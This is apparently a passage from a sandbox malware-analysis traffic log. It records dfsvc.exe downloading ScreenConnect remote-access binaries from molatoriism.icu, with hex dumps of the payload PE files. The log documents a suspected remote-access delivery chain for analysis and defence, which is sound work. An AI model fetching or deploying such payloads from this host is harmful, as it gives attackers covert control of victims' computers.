                                                                                                                                                                              2024-11-07 17:04:40 UTC1369INData Raw: 73 01 01 00 0a 25 80 4d 00 00 04 28 2e 00 00 2b 28 2f 00 00 2b 13 0a 09 11 0a 66 5f 16 13 0b 28 30 00 00 2b 6f 04 01 00 0a 13 0c 38 96 00 00 00 11 0c 6f 05 01 00 0a 13 0d 12 01 28 8a 00 00 0a 08 11 0d 02 fe 06 10 00 00 06 73 06 01 00 0a 06 7b 77 00 00 04 25 2d 18 26 06 06 fe 06 c6 00 00 06 73 be 00 00 0a 25 13 0f 7d 77 00 00 04 11 0f 06 7b 78 00 00 04 25 2d 18 26 06 06 fe 06 c7 00 00 06 73 07 01 00 0a 25 13 10 7d 78 00 00 04 11 10 28 61 00 00 06 13 0e 11 0e 2c 2a 11 0e 02 7b 08 00 00 04 6f 60 00 00 06 17 13 0b 02 7b 07 00 00 04 11 0e 6f 08 01 00 0a de 0b 26 11 0e 16 6f 62 00 00 06 de 00 11 0c 6f 11 00 00 0a 3a 5e ff ff ff de 0c 11 0c 2c 07 11 0c 6f 10 00 00 0a dc 11 0b 2c 41 02 7b 08 00 00 04 7e 4e 00 00 04 25 2d 17 26 7e 2b 00 00 04 fe 06 8b 00 00 06 73
                                                                                                                                                                              Data Ascii: s%M(.+(/+f_(0+o8o(s{w%-&s%}w{x%-&s%}x(a,*{o`{o&obo:^,o,A{~N%-&~+s
                                                                                                                                                                              2024-11-07 17:04:40 UTC1369INData Raw: 0a 25 03 7b 31 01 00 0a 6f 32 01 00 0a 25 03 7b 33 01 00 0a 6f 34 01 00 0a 25 03 7b 35 01 00 0a 6f 36 01 00 0a 25 03 7b 37 01 00 0a 6f 38 01 00 0a 25 02 03 7b 37 01 00 0a 03 7b 35 01 00 0a 28 15 00 00 06 6f 39 01 00 0a 2a 00 00 1b 30 03 00 64 00 00 00 11 00 00 11 28 3a 01 00 0a 0a 06 02 28 27 00 00 06 28 3b 01 00 0a 0b 07 28 3c 01 00 0a 28 3d 01 00 0a 26 de 14 07 2c 06 07 6f 10 00 00 0a dc 06 2c 06 06 6f 10 00 00 0a dc 7e 3e 01 00 0a 72 20 03 00 70 17 6f 3f 01 00 0a 0c 08 2d 02 de 18 08 02 28 27 00 00 06 28 40 01 00 0a de 0a 08 2c 06 08 6f 10 00 00 0a dc 2a 01 28 00 00 02 00 13 00 0e 21 00 0a 00 00 00 00 02 00 06 00 25 2b 00 0a 00 00 00 00 02 00 46 00 13 59 00 0a 00 00 00 00 c6 03 02 7b 08 00 00 04 7e 44 00 00 04 25 2d 17 26 7e 2b 00 00 04 fe 06 81 00 00
                                                                                                                                                                              Data Ascii: %{1o2%{3o4%{5o6%{7o8%{7{5(o9*0d(:('(;(<(=&,o,o~>r po?-('(@,o*(!%+FY{~D%-&~+
                                                                                                                                                                              2024-11-07 17:04:40 UTC1369INData Raw: 13 08 11 08 7b 63 01 00 0a 12 09 fe 15 1a 00 00 01 11 09 28 64 01 00 0a 2c 0c 11 08 7b 65 01 00 0a 39 c6 00 00 00 02 7b 17 00 00 04 7e 90 00 00 04 25 2d 17 26 7e 8a 00 00 04 fe 06 d8 00 00 06 73 58 01 00 0a 25 80 90 00 00 04 28 3f 00 00 2b 11 07 7b 99 00 00 04 25 2d 1a 26 11 07 11 07 fe 06 e4 00 00 06 73 58 01 00 0a 25 13 0a 7d 99 00 00 04 11 0a 28 3f 00 00 2b 6f 60 01 00 0a 13 06 2b 50 11 06 6f 61 01 00 0a 13 0b 28 66 01 00 0a 11 0b 7b 82 00 00 04 11 07 7c 98 00 00 04 7b 65 01 00 0a 6f 67 01 00 0a 11 0b 7b 82 00 00 04 6f 68 01 00 0a de 1c 26 11 0b 7b 7f 00 00 04 1b 2e 08 11 0b 1a 7d 7f 00 00 04 11 0b 28 37 00 00 06 de 00 11 06 6f 11 00 00 0a 2d a7 dd 04 ff ff ff 11 06 2c 07 11 06 6f 10 00 00 0a dc 02 28 55 01 00 0a 07 15 6a 2e 16 28 97 00 00 0a 6f fc 00
                                                                                                                                                                              Data Ascii: {c(d,{e9{~%-&~sX%(?+{%-&sX%}(?+o`+Poa(f{|{eog{oh&{.}(7o-,o(Uj.(o
                                                                                                                                                                              2024-11-07 17:04:40 UTC1369INData Raw: 0a 02 28 4a 00 00 06 25 2d 04 26 14 2b 05 6f 25 00 00 0a 02 06 06 6f 1e 01 00 0a 28 81 01 00 0a 28 82 01 00 0a 2a 13 30 05 00 23 00 00 00 18 00 00 11 12 01 fe 15 73 00 00 01 12 01 02 7d 83 01 00 0a 07 0a 14 03 19 12 00 17 28 84 01 00 0a 28 82 01 00 0a 2a 00 13 30 05 00 23 00 00 00 18 00 00 11 12 01 fe 15 73 00 00 01 12 01 02 7d 83 01 00 0a 07 0a 14 03 19 12 00 17 28 85 01 00 0a 28 82 01 00 0a 2a 00 1b 30 06 00 89 00 00 00 19 00 00 11 12 02 fe 15 74 00 00 01 12 02 02 7d 86 01 00 0a 12 02 03 7d 87 01 00 0a 12 02 17 7d 88 01 00 0a 12 02 04 7d 89 01 00 0a 08 0a 14 17 12 00 12 01 28 8a 01 00 0a 28 82 01 00 0a 05 2d 4b 7e 8b 01 00 0a 72 5e 04 00 70 17 17 17 28 8c 01 00 0a 0d 17 1a 73 8d 01 00 0a 13 04 09 28 3c 01 00 0a 02 16 1a 11 04 6f 8e 01 00 0a 1a 28 8f 01
                                                                                                                                                                              Data Ascii: (J%-&+o%o((*0#s}((*0#s}((*0t}}}}((-K~r^p(s(<o(


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              10192.168.2.549764172.67.182.2144437120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-07 17:04:41 UTC93OUTGET /Bin/ScreenConnect.Windows.dll HTTP/1.1
                                                                                                                                                                              Host: molatoriism.icu
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              2024-11-07 17:04:41 UTC775INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 07 Nov 2024 17:04:41 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FUrl74SWZg%2FqXPCEzi5n295GwuEG34gbm1%2FhaXuVT1G%2FpT8192Ub6eSpuueEuuHB6DX6TjEUYMo4oiBWjnr9M4HRGcrjuzVhDMO42whJb8lJBr%2BQhIWMoKJDxX%2BF1EjD5Xg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8deee762bf1f4787-DFW
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1855&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=708&delivery_rate=1577342&cwnd=251&unsent_bytes=0&cid=0be78ab4a89b4fc2&ts=629&x=0"
                                                                                                                                                                              2024-11-07 17:04:41 UTC594INData Raw: 34 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c da d0 ab 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 3e 1a 00 00 06 00 00 00 00 00 00 82 5d 1a 00 00 20 00 00 00 60 1a 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 1a 00 00 02 00 00 5b ab 1a 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00
                                                                                                                                                                              Data Ascii: 4000MZ@!L!This program cannot be run in DOS mode.$PELl" 0>] ` [@
                                                                                                                                                                              2024-11-07 17:04:41 UTC1369INData Raw: 00 00 00 00 1e 02 28 29 00 00 0a 2a 5e 02 28 29 00 00 0a 02 17 8d c9 00 00 01 25 16 03 9c 7d 01 00 00 04 2a 3a 02 28 29 00 00 0a 02 03 7d 01 00 00 04 2a 3a 02 28 29 00 00 0a 02 03 7d 02 00 00 04 2a 3a 02 28 29 00 00 0a 02 03 7d 03 00 00 04 2a 1e 02 73 2a 00 00 0a 2a 1e 02 73 2b 00 00 0a 2a 3a 02 28 2c 00 00 0a 02 03 28 2d 00 00 0a 2a 1e 02 7b 2e 00 00 0a 2a 22 02 03 7d 2e 00 00 0a 2a 4a 02 28 2f 00 00 0a 8c 0f 00 00 1b 28 30 00 00 0a 26 2a 3a 02 28 2c 00 00 0a 02 03 28 31 00 00 0a 2a 1e 02 7b 32 00 00 0a 2a 22 02 03 7d 32 00 00 0a 2a 13 30 02 00 28 00 00 00 01 00 00 11 02 28 33 00 00 0a 0a 16 0b 2b 16 06 07 a3 0f 00 00 1b 8c 0f 00 00 1b 28 30 00 00 0a 26 07 17 58 0b 07 06 8e 69 32 e4 2a 76 02 28 2c 00 00 0a 02 73 34 00 00 0a 7d 0b 00 00 04 02 73 35 00 00
                                                                                                                                                                              Data Ascii: ()*^()%}*:()}*:()}*:()}*s**s+*:(,(-*{.*"}.*J(/(0&*:(,(1*{2*"}2*0((3+(0&Xi2*v(,s4}s5
                                                                                                                                                                              2024-11-07 17:04:41 UTC1369INData Raw: 6f 22 00 00 06 25 06 fe 06 be 02 00 06 73 5f 00 00 0a 6f 26 00 00 06 2a 00 00 00 13 30 04 00 29 00 00 00 08 00 00 11 02 12 00 04 05 6f 60 00 00 0a 2d 09 0e 04 28 cb 00 00 06 14 2a 73 3e 00 00 06 25 06 6f 22 00 00 06 25 03 6f 26 00 00 06 2a 00 00 00 13 30 04 00 41 00 00 00 0a 00 00 11 73 61 00 00 0a 0a 06 03 7d 62 00 00 0a 02 12 01 04 05 6f 60 00 00 0a 2d 09 0e 04 28 cb 00 00 06 14 2a 73 3e 00 00 06 25 07 6f 22 00 00 06 25 06 fe 06 63 00 00 0a 73 5f 00 00 0a 6f 26 00 00 06 2a 00 00 00 13 30 04 00 29 00 00 00 08 00 00 11 02 04 05 12 00 6f 64 00 00 0a 2d 09 0e 04 28 cb 00 00 06 14 2a 73 3e 00 00 06 25 06 6f 22 00 00 06 25 03 6f 26 00 00 06 2a 00 00 00 13 30 04 00 41 00 00 00 0b 00 00 11 73 65 00 00 0a 0a 06 03 7d 66 00 00 0a 02 04 05 12 01 6f 64 00 00 0a 2d
                                                                                                                                                                              Data Ascii: o"%s_o&*0)o`-(*s>%o"%o&*0Asa}bo`-(*s>%o"%cs_o&*0)od-(*s>%o"%o&*0Ase}fod-
                                                                                                                                                                              2024-11-07 17:04:41 UTC1369INData Raw: 00 11 02 7b 15 00 00 04 0a 06 0b 07 03 28 88 00 00 0a 74 01 00 00 1b 0c 02 7c 15 00 00 04 08 07 28 0b 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 04 00 5b 00 00 00 14 00 00 11 04 28 89 00 00 0a 0a 06 20 00 01 00 00 2e 18 06 20 01 01 00 00 2e 10 06 20 04 01 00 00 2e 08 06 20 05 01 00 00 33 26 05 d0 b0 00 00 02 28 51 00 00 0a 28 8a 00 00 0a a5 b0 00 00 02 0b 02 07 6f 41 00 00 06 2c 07 17 28 8b 00 00 0a 2a 7e 5e 00 00 0a 03 04 05 28 d3 01 00 06 2a 1e 02 7b 16 00 00 04 2a 22 02 03 7d 16 00 00 04 2a 1e 02 7b 17 00 00 04 2a 22 02 03 7d 17 00 00 04 2a 1e 02 28 8c 00 00 0a 2a 00 00 00 13 30 04 00 48 00 00 00 08 00 00 11 03 28 8d 00 00 0a 20 0a 02 00 00 33 39 03 28 8e 00 00 0a 28 21 01 00 06 28 9f 01 00 06 0a 06 7e 5e 00 00 0a 28 84 00 00 0a 2c 1b 06 03 28 8d 00 00
                                                                                                                                                                              Data Ascii: {(t|(+3*0[( . . . 3&(Q(oA,(*~^(*{*"}*{*"}*(*0H( 39((!(~^(,(
                                                                                                                                                                              2024-11-07 17:04:41 UTC1369INData Raw: 00 00 0a 02 7b 22 00 00 04 02 fe 06 5f 00 00 06 73 ae 00 00 0a 6f af 00 00 0a 02 7b 21 00 00 04 73 b0 00 00 0a 6f b1 00 00 0a 02 7b 21 00 00 04 6f b2 00 00 0a 6f b3 00 00 0a 72 51 00 00 70 6f b4 00 00 0a 26 02 7b 21 00 00 04 6f b2 00 00 0a 02 fe 06 5b 00 00 06 73 b5 00 00 0a 6f b6 00 00 0a 02 73 b7 00 00 0a 7d 1f 00 00 04 02 28 b8 00 00 0a 7e 5e 00 00 0a 20 fa 00 00 00 7e 5e 00 00 0a 28 bb 01 00 06 26 2a 00 1b 30 04 00 59 01 00 00 18 00 00 11 02 03 28 b9 00 00 0a 03 28 8d 00 00 0a 20 13 01 00 00 40 41 01 00 00 14 0a 02 7b 1f 00 00 04 0b 07 28 4c 00 00 0a 02 7b 1f 00 00 04 02 7b 20 00 00 04 02 7b 1f 00 00 04 6f ba 00 00 0a 02 7b 20 00 00 04 59 6f bb 00 00 0a 28 0e 00 00 2b 0a 02 02 7b 1f 00 00 04 6f ba 00 00 0a 7d 20 00 00 04 de 07 07 28 56 00 00 0a dc 06
                                                                                                                                                                              Data Ascii: {"_so{!so{!oorQpo&{!o[sos}(~^ ~^(&*0Y(( @A{(L{{ {o{ Yo(+{o} (V
                                                                                                                                                                              2024-11-07 17:04:41 UTC1369INData Raw: 51 00 00 0a 6f e5 00 00 0a 6f e6 00 00 0a 74 2c 00 00 02 0a 06 02 fe 06 6c 00 00 06 73 e7 00 00 0a 6f d2 02 00 06 02 7b 23 00 00 04 03 6f e1 00 00 0a 06 6f e8 00 00 0a 06 2a 00 00 1b 30 05 00 bb 01 00 00 1b 00 00 11 02 03 28 5c 00 00 06 03 6f b3 00 00 0a 02 7b 24 00 00 04 2d 07 72 bb 00 00 70 2b 05 72 c7 00 00 70 14 02 fe 06 6e 00 00 06 73 ae 00 00 0a 1f 73 73 d0 00 00 0a 6f d1 00 00 0a 26 03 6f b3 00 00 0a 73 d2 00 00 0a 6f d1 00 00 0a 26 28 00 01 00 06 6f 20 00 00 0a 0a 38 47 01 00 00 06 6f 1f 00 00 0a 0b 02 07 28 6a 00 00 06 0c 03 6f b3 00 00 0a 07 6f e9 00 00 0a 6f b4 00 00 0a 74 40 00 00 01 0d 09 08 6f ea 00 00 0a 08 6f cf 02 00 06 7e 97 00 00 04 25 2d 17 26 7e 96 00 00 04 fe 06 d9 02 00 06 73 eb 00 00 0a 25 80 97 00 00 04 28 0f 00 00 2b 6f ed 00 00
                                                                                                                                                                              Data Ascii: Qoot,lso{#oo*0(\o{$-rp+rpnssso&oso&(o 8Go(jooot@oo~%-&~s%(+o
                                                                                                                                                                              2024-11-07 17:04:41 UTC1369INData Raw: 00 00 0a 02 7b 28 00 00 04 6f fd 00 00 0a 0c 12 02 28 ff 00 00 0a 1f 20 16 28 54 00 00 06 7d 2b 00 00 04 02 7b 2b 00 00 04 6f 52 00 00 06 16 16 02 7b 28 00 00 04 6f fd 00 00 0a 0c 12 02 28 fe 00 00 0a 02 7b 28 00 00 04 6f fd 00 00 0a 0c 12 02 28 ff 00 00 0a 02 7b 2a 00 00 04 6f 52 00 00 06 12 00 28 03 01 00 0a 12 00 28 04 01 00 0a 20 20 00 cc 00 28 52 01 00 06 26 02 7b 2a 00 00 04 6f 52 00 00 06 28 05 01 00 0a 0d 02 7b 28 00 00 04 6f 06 01 00 0a 28 10 00 00 2b 09 06 6f 07 01 00 0a de 0a 09 2c 06 09 6f 11 00 00 0a dc 02 7b 27 00 00 04 03 17 02 7b 2a 00 00 04 6f 4f 00 00 06 02 7b 2a 00 00 04 6f 08 01 00 0a 28 95 00 00 0a 02 7b 2a 00 00 04 6f 02 01 00 0a 5a 16 16 d3 16 d3 28 3a 02 00 06 28 04 01 00 06 02 7b 28 00 00 04 39 c2 00 00 00 12 04 02 7c 29 00 00 04
                                                                                                                                                                              Data Ascii: {(o( (T}+{+oR{(o({(o({*oR(( (R&{*oR({(o(+o,o{'{*oO{*o({*oZ(:({(9|)
                                                                                                                                                                              2024-11-07 17:04:41 UTC1369INData Raw: 13 20 dc 14 72 c1 01 00 70 18 16 e0 16 e0 16 e0 16 e0 12 08 e0 12 0e e0 28 81 01 00 06 28 04 01 00 06 12 0a 08 8e 69 7d 4e 02 00 04 12 08 e0 16 e0 04 6f 15 01 00 0a 20 1c 08 00 00 16 1f 10 16 e0 16 12 09 e0 12 0c e0 12 0f e0 16 e0 28 82 01 00 06 18 8d db 00 00 01 25 17 20 12 03 09 00 9e 28 03 01 00 06 2b 5d 11 10 2c 59 11 10 28 24 01 00 0a 13 27 11 27 16 09 16 11 27 8e 69 28 25 01 00 0a 12 0b 11 27 8e 69 7d 4e 02 00 04 12 0a 08 8e 69 7d 4e 02 00 04 12 08 e0 12 09 e0 04 6f 15 01 00 0a 20 1c 08 00 00 16 1f 10 12 0d e0 16 12 09 e0 12 0c e0 12 0f e0 16 e0 28 82 01 00 06 28 04 01 00 06 08 16 11 0a 7b 4e 02 00 04 28 26 01 00 0a 13 1c 11 16 72 cb 01 00 70 11 1c 28 93 00 00 0a 6f 18 01 00 0a 11 16 72 01 02 00 70 6f 18 01 00 0a 2b 2c 07 2c 29 04 6f 19 01 00 0a 28
                                                                                                                                                                              Data Ascii: rp((i}No (% (+],Y($'''i(%'i}Ni}No (({N(&rp(orpo+,,)o(
                                                                                                                                                                              2024-11-07 17:04:41 UTC1369INData Raw: 00 0a 25 80 9a 00 00 04 28 16 00 00 2b 28 17 00 00 2b 28 18 00 00 2b 13 08 11 08 28 4c 01 00 0a 2d 05 11 08 0d de 02 fe 1a 09 2a 00 00 01 10 00 00 00 00 00 00 62 62 00 da 15 00 00 01 13 30 05 00 76 00 00 00 22 00 00 11 73 e3 02 00 06 0a 06 28 19 00 00 2b 7d 9c 00 00 04 28 4e 01 00 0a 28 4f 01 00 0a 6f 50 01 00 0a 0b 06 fe 06 e4 02 00 06 73 51 01 00 0a 14 28 52 01 00 0a 26 06 7b 9c 00 00 04 8e 69 07 8e 69 58 8d c9 00 00 01 0c 06 7b 9c 00 00 04 16 08 16 06 7b 9c 00 00 04 8e 69 28 25 01 00 0a 07 16 08 06 7b 9c 00 00 04 8e 69 07 8e 69 28 25 01 00 0a 08 28 53 01 00 0a 2a 4a 7e 34 01 00 0a 6f 54 01 00 0a 20 e8 03 00 00 5a 6a 2a 1a 73 de 02 00 06 2a 2e 7e 34 01 00 0a 6f 55 01 00 0a 2a 2e 7e 34 01 00 0a 6f 56 01 00 0a 2a 2e 7e 34 01 00 0a 6f 57 01 00 0a 2a 2e 7e
                                                                                                                                                                              Data Ascii: %(+(+(+(L-*bb0v"s(+}(N(OoPsQ(R&{iiX{{i(%{ii(%(S*J~4oT Zj*s*.~4oU*.~4oV*.~4oW*.~
                                                                                                                                                                              2024-11-07 17:04:42 UTC1369INData Raw: 20 ff 00 00 00 7e 5e 00 00 0a 18 17 16 8d db 00 00 01 28 1e 00 00 2b 2a 5a 02 6f 75 01 00 0a 2c 0c 02 6f 76 01 00 0a 6f 77 01 00 0a 2a 16 2a ce 02 28 71 01 00 06 2d 06 73 78 01 00 0a 7a 7e b0 00 00 04 25 2d 17 26 7e af 00 00 04 fe 06 fd 02 00 06 73 51 01 00 0a 25 80 b0 00 00 04 73 79 01 00 0a 2a 00 1b 30 03 00 93 00 00 00 25 00 00 11 28 0d 01 00 06 1b 17 73 6d 01 00 0a 28 7a 01 00 0a 2c 06 73 7b 01 00 0a 7a 28 bf 00 00 06 12 00 28 01 02 00 06 2d 06 73 78 01 00 0a 7a 06 7e a1 00 00 04 25 2d 13 26 14 fe 06 49 02 00 06 73 72 01 00 0a 25 80 a1 00 00 04 16 8d db 00 00 01 28 2d 00 00 06 0b 07 28 95 00 00 06 0c 08 28 3a 00 00 06 28 97 00 00 06 0d 02 6f 7c 01 00 0a 13 04 de 1e 09 2c 06 09 6f 11 00 00 0a dc 08 2c 06 08 6f 11 00 00 0a dc 07 2c 06 07 6f 11 00 00 0a
                                                                                                                                                                              Data Ascii: ~^(+*Zou,ovow**(q-sxz~%-&~sQ%sy*0%(sm(z,s{z((-sxz~%-&Isr%(-((:(o|,o,o,o


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              11192.168.2.549795172.67.182.2144437120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-07 17:04:47 UTC99OUTGET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1
                                                                                                                                                                              Host: molatoriism.icu
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              2024-11-07 17:04:47 UTC794INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 07 Nov 2024 17:04:47 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                              CF-Cache-Status: BYPASS
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DazlSI0fnQmk0Z9i5QdG3AfPXkycR%2FEyXQU0ixrHE7uiXd9YWau6d8Akl2tt3en8kRH%2FePY0946N2Nud85l%2B136fcZwWsqSWY%2BlrdXiuYkn7xw8IJHpt5Ab5IU1SnqYYwxw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8deee789a99d6b38-DFW
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1287&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=714&delivery_rate=2269592&cwnd=251&unsent_bytes=0&cid=07332de5b5f03cae&ts=318&x=0"
                                                                                                                                                                              2024-11-07 17:04:47 UTC575INData Raw: 37 64 33 62 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7b 3c 99 98 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 fc 08 00 00 06 00 00 00 00 00 00 92 15 09 00 00 20 00 00 00 20 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 09 00 00 02 00 00 19 78 09 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00
                                                                                                                                                                              Data Ascii: 7d3bMZ@!L!This program cannot be run in DOS mode.$PEL{<"0 @ `x@
                                                                                                                                                                              2024-11-07 17:04:47 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 7b 44 00 00 0a 2a 1e 02 7b 45 00 00 0a 2a 56 02 28 46 00 00 0a 02 03 7d 44 00 00 0a 02 04 7d 45 00 00 0a 2a 00 00 13 30 03 00 41 00 00 00 01 00 00 11 03 75 31 00 00 1b 0a 02 06 2e 34 06 2c 2f 28 47 00 00 0a 02 7b 44 00 00 0a 06 7b 44 00 00 0a 6f 48 00 00 0a 2c 17 28 49 00 00 0a 02 7b 45 00 00 0a 06 7b 45 00 00 0a 6f 4a 00 00 0a 2a 16 2a 17 2a d2 20 7d f4 81 6f 20 29 55 55 a5 5a 28 47 00 00 0a 02 7b 44 00 00 0a 6f 4b 00 00 0a 58 20 29 55 55 a5 5a 28 49 00 00 0a 02 7b 45 00 00 0a 6f 4c 00 00 0a 58 2a 00 00 13 30 07 00 62 00 00 00 02 00 00 11 14 72 01 00 00 70 18 8d 11 00 00 01 25 16 02 7b 44 00 00 0a 0a 12 00 25 71 34 00 00 1b 8c 34 00 00 1b 2d 04 26 14 2b 0b fe 16 34 00 00 1b 6f 4d
                                                                                                                                                                              Data Ascii: {D*{E*V(F}D}E*0Au1.4,/(G{D{DoH,(I{E{EoJ*** }o )UUZ(G{DoKX )UUZ(I{EoLX*0brp%{D%q44-&+4oM
                                                                                                                                                                              2024-11-07 17:04:47 UTC1369INData Raw: 0a 6f 5f 00 00 0a 2a 16 2a 17 2a 00 00 00 13 30 03 00 79 00 00 00 00 00 00 00 20 7f 00 b1 02 20 29 55 55 a5 5a 28 47 00 00 0a 02 7b 55 00 00 0a 6f 4b 00 00 0a 58 20 29 55 55 a5 5a 28 49 00 00 0a 02 7b 56 00 00 0a 6f 4c 00 00 0a 58 20 29 55 55 a5 5a 28 5a 00 00 0a 02 7b 57 00 00 0a 6f 60 00 00 0a 58 20 29 55 55 a5 5a 28 5c 00 00 0a 02 7b 58 00 00 0a 6f 61 00 00 0a 58 20 29 55 55 a5 5a 28 5e 00 00 0a 02 7b 59 00 00 0a 6f 62 00 00 0a 58 2a 00 00 00 13 30 07 00 db 00 00 00 07 00 00 11 14 72 59 01 00 70 1b 8d 11 00 00 01 25 16 02 7b 55 00 00 0a 0a 12 00 25 71 34 00 00 1b 8c 34 00 00 1b 2d 04 26 14 2b 0b fe 16 34 00 00 1b 6f 4d 00 00 0a a2 25 17 02 7b 56 00 00 0a 0b 12 01 25 71 35 00 00 1b 8c 35 00 00 1b 2d 04 26 14 2b 0b fe 16 35 00 00 1b 6f 4d 00 00 0a a2 25
                                                                                                                                                                              Data Ascii: o_***0y )UUZ(G{UoKX )UUZ(I{VoLX )UUZ(Z{Wo`X )UUZ(\{XoaX )UUZ(^{YobX*0rYp%{U%q44-&+4oM%{V%q55-&+5oM%
                                                                                                                                                                              2024-11-07 17:04:47 UTC1369INData Raw: 29 55 55 a5 5a 28 49 00 00 0a 02 7b 6a 00 00 0a 6f 4c 00 00 0a 58 2a 00 00 13 30 07 00 62 00 00 00 02 00 00 11 14 72 46 03 00 70 18 8d 11 00 00 01 25 16 02 7b 69 00 00 0a 0a 12 00 25 71 34 00 00 1b 8c 34 00 00 1b 2d 04 26 14 2b 0b fe 16 34 00 00 1b 6f 4d 00 00 0a a2 25 17 02 7b 6a 00 00 0a 0b 12 01 25 71 35 00 00 1b 8c 35 00 00 1b 2d 04 26 14 2b 0b fe 16 35 00 00 1b 6f 4d 00 00 0a a2 28 4e 00 00 0a 2a 1e 02 7b 6b 00 00 0a 2a 1e 02 7b 6c 00 00 0a 2a 56 02 28 46 00 00 0a 02 03 7d 6b 00 00 0a 02 04 7d 6c 00 00 0a 2a 13 30 03 00 41 00 00 00 0c 00 00 11 03 75 44 00 00 1b 0a 02 06 2e 34 06 2c 2f 28 47 00 00 0a 02 7b 6b 00 00 0a 06 7b 6b 00 00 0a 6f 48 00 00 0a 2c 17 28 49 00 00 0a 02 7b 6c 00 00 0a 06 7b 6c 00 00 0a 6f 4a 00 00 0a 2a 16 2a 17 2a d2 20 28 58 ea
                                                                                                                                                                              Data Ascii: )UUZ(I{joLX*0brFp%{i%q44-&+4oM%{j%q55-&+5oM(N*{k*{l*V(F}k}l*0AuD.4,/(G{k{koH,(I{l{loJ*** (X
                                                                                                                                                                              2024-11-07 17:04:47 UTC1369INData Raw: 2a d2 20 e4 8c e4 88 20 29 55 55 a5 5a 28 47 00 00 0a 02 7b 73 00 00 0a 6f 4b 00 00 0a 58 20 29 55 55 a5 5a 28 49 00 00 0a 02 7b 74 00 00 0a 6f 4c 00 00 0a 58 2a 00 00 13 30 07 00 62 00 00 00 02 00 00 11 14 72 45 06 00 70 18 8d 11 00 00 01 25 16 02 7b 73 00 00 0a 0a 12 00 25 71 34 00 00 1b 8c 34 00 00 1b 2d 04 26 14 2b 0b fe 16 34 00 00 1b 6f 4d 00 00 0a a2 25 17 02 7b 74 00 00 0a 0b 12 01 25 71 35 00 00 1b 8c 35 00 00 1b 2d 04 26 14 2b 0b fe 16 35 00 00 1b 6f 4d 00 00 0a a2 28 4e 00 00 0a 2a 1e 02 28 75 00 00 0a 2a 5e 02 28 75 00 00 0a 02 17 8d 32 02 00 01 25 16 03 9c 7d 20 00 00 04 2a 3a 02 28 75 00 00 0a 02 03 7d 20 00 00 04 2a 3a 02 28 75 00 00 0a 02 03 7d 21 00 00 04 2a 5e 02 28 75 00 00 0a 02 17 8d 33 02 00 01 25 16 17 9c 7d 22 00 00 04 2a 3a 02 28
